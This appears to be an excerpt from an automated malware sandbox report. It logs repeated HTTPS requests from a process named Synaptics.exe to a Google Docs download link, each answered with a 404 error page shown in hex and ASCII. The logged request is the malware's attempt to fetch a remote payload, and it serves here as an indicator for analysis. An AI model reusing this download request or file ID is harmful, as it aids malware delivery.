                                                                                                                                                                                        2022-05-17 11:31:53 UTC530INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:53 UTC530INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 52 53 70 71 67 39 77 70 45 74 34 32 67 4f 64 68 62 74 4a 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SRSpqg9wpEt42gOdhbtJlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:53 UTC532INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:53 UTC532INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        174192.168.2.349944142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC529OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:53 UTC532INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-V16PeF6TGjVdxPnGmonT1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:53 UTC533INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:53 UTC533INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 50 33 47 4d 33 70 49 71 6e 50 48 5a 64 50 33 62 61 66 4f 61 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NP3GM3pIqnPHZdP3bafOaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:53 UTC535INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:53 UTC535INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        175192.168.2.349945142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC532OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:53 UTC535INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QCNbdgp6Ln4EeVykUH/YqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:53 UTC536INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 59 33 2b 4b 73 4a 4a 38 76 45 33 44 52 7a 67 36 72 67 6a 42 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yY3+KsJJ8vE3DRzg6rgjBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:53 UTC538INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:53 UTC538INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        176192.168.2.349946142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC535OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:53 UTC538INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GrZHkuQ51njMZ/qTCPNofQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:53 UTC540INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 4c 72 59 45 68 2b 65 53 4c 55 55 79 69 49 75 35 4b 65 6e 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lLrYEh+eSLUUyiIu5KenyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:53 UTC541INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:53 UTC541INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        177192.168.2.349947142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC538OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:53 UTC541INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-B3kFKwfFhoSH9PTruRc3Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:53 UTC543INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 69 31 51 49 77 34 33 71 55 74 36 6f 76 38 66 74 4b 5a 56 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ti1QIw43qUt6ov8ftKZVgw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:53 UTC544INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:53 UTC544INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        178192.168.2.349949142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC541OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:53 UTC545INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-zETi9qQkiXP1wmYXWNUy/w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:53 UTC546INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
